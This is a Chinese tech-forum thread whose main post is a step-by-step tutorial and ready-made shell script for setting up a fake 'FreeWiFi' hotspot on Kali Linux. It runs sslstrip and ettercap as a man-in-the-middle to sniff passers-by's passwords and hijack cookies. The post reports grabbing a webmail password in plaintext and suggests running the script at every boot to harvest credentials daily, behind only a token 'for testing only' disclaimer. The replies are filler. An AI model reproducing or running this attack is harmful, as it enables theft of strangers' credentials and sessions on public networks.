极客之眼团队极客硬件网络技术研究

 找回密码
 注册成为极客之眼的一份子
搜索
查看: 142|回复: 5

kali linux下用airbase-ng+dhcpd做wifi安全测试

[复制链接]

2

主题

16 小时

在线时间

118

极客币

注册会员

Rank: 2

积分
141

最佳新人活跃的少年热心会员灌水之王

QQ
发表于 2020-2-14 10:12:41 | 显示全部楼层 |阅读模式
技术不是用来非法牟利的工具,利用所学技术来努力维护国家安全才是正确的价值观!

每一位喜欢的技术的朋友都应该自觉遵守和维护国家网络安全!
爱党爱国才能一起让我们的祖国强大起来!
请合理合法的使用你手里任何的技术设备和工具!
仅供技术测试!!!!!

这里介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!
所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:
Aircrack-ng 套件#用来发送数据
isc-dhcp-server#简单的dhcp服务器
sslstrip#突破ssl加密
ettercap#嗅探劫持
leaf /etc/dhcp/dhcpd.conf编辑dhcp服务器配置文件,修改如下:
authoritative;
default-lease-time700;
max-lease-time8000;
subnet10.0.0.0netmask255.255.255.0{
option routers10.0.0.1;
option subnet-mask255.255.255.0;
option domain-name'FreeWiFi';
option domain-name-servers10.0.0.1;
range10.0.0.1010.0.0.100;
}
然后激活网卡至监听模式:
airmon-ng start wlan0
airbase-ng -e FreeWiFi -c 6 mon0
此时虚拟wifi的信号已经发送出去了,如果出现错误:
Error: Got channel -1, expected a value > 0.
执行如下命令:
airmon-ng stop mon0
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
然后从激活网卡至监听模式那里重新开始。
接着执行如下命令:
ifconfig at0 up
ifconfig at010.0.0.1netmask255.255.255.0
ifconfig at0 mtu1400
route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1
iptables--flush
iptables--table nat--flush
iptables--delete-chain
iptables--table nat--delete-chain
echo1>/proc/sys/net/ipv4/ip_forward
iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1
iptables-P FORWARD ACCEPT
iptables--append FORWARD--in-interfaceat0-j ACCEPT
iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE
iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000
dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:
sslstrip-fpk10000
ettercap-Tpuqiat0
然后就等着鱼儿上钩吧!
手机上测试了下,网易邮箱直接明文密码:
百度使用了加密:
写了一个脚本,修改成自己的设置每次执行就ok了:
复制下面代码,保存为 “Fake_a_ap.sh”,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh
#!/bin/sh
echo '即将创建WiFi热点,请确保dhcpd.conf已经配置好!' &
sleep5
ifconfig wlan0 down#wlan0修改成你的网卡
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0&
sleep5
airbase-ng-eFreeWiFi-c6mon0&#修改成自己的热点名称和信道
sleep5
ifconfig at0 up
ifconfig at010.0.0.1netmask255.255.255.0
ifconfig at0 mtu1400
route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1
iptables--flush&&iptables--table nat--flush&&iptables--table nat--flush&&iptables--table nat--delete-chain&
echo1>/proc/sys/net/ipv4/ip_forward
iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1
iptables-P FORWARD ACCEPT
iptables--append FORWARD--in-interfaceat0-j ACCEPT
iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE
iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000
dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0
sleep2
/etc/init.d/isc-dhcp-server start&
sleep5
sslstrip-fpk10000&
ettercap-puTqi at0
当然还可以更加流氓!简单Ettercap 使用进阶(1):详细参数:设置成将数据包保存到本地,然后再把这个脚本添加到“启动应用程序”里或者Kali-linux 定时执行任务Crontab的简单设置 ,让它随系统启动,然后就没有然后了:每天睡觉前打开数据包检查下里面的username,passwd,cookie,,etc
                                                                                                                                                                                             shadow---仅供参考
回复

使用道具 举报

0

主题

1 小时

在线时间

1

极客币

新手上路

Rank: 1

积分
5
发表于 2020-2-15 15:32:15 | 显示全部楼层
极客技术论坛,有你更精彩!
回复

使用道具 举报

5

主题

47 小时

在线时间

128

极客币

中级会员

Rank: 3Rank: 3

积分
332
发表于 2020-2-15 23:49:21 | 显示全部楼层
啥也不说了,楼主就是给力!
回复

使用道具 举报

0

主题

1 小时

在线时间

10

极客币

新手上路

Rank: 1

积分
12
发表于 2020-2-19 19:38:08 | 显示全部楼层
极客技术论坛,有你更精彩!
回复

使用道具 举报

0

主题

2 小时

在线时间

11

极客币

新手上路

Rank: 1

积分
31
发表于 2020-2-19 20:26:08 | 显示全部楼层
极客技术论坛,有你更精彩!
回复

使用道具 举报

0

主题

2 小时

在线时间

11

极客币

新手上路

Rank: 1

积分
31
发表于 前天 10:50 | 显示全部楼层
极客技术论坛,有你更精彩!
回复

使用道具 举报

本版积分规则

Loading...

QQ|技术硬件网络论坛|小黑屋|极客之眼团队 ( 滇ICP备18000070号 )

GMT+8, 2020-2-27 16:14 , Processed in 0.095576 second(s), 43 queries .

极客之眼始于丙申年庚子月戊子日——————————至今

快速回复 返回顶部 返回列表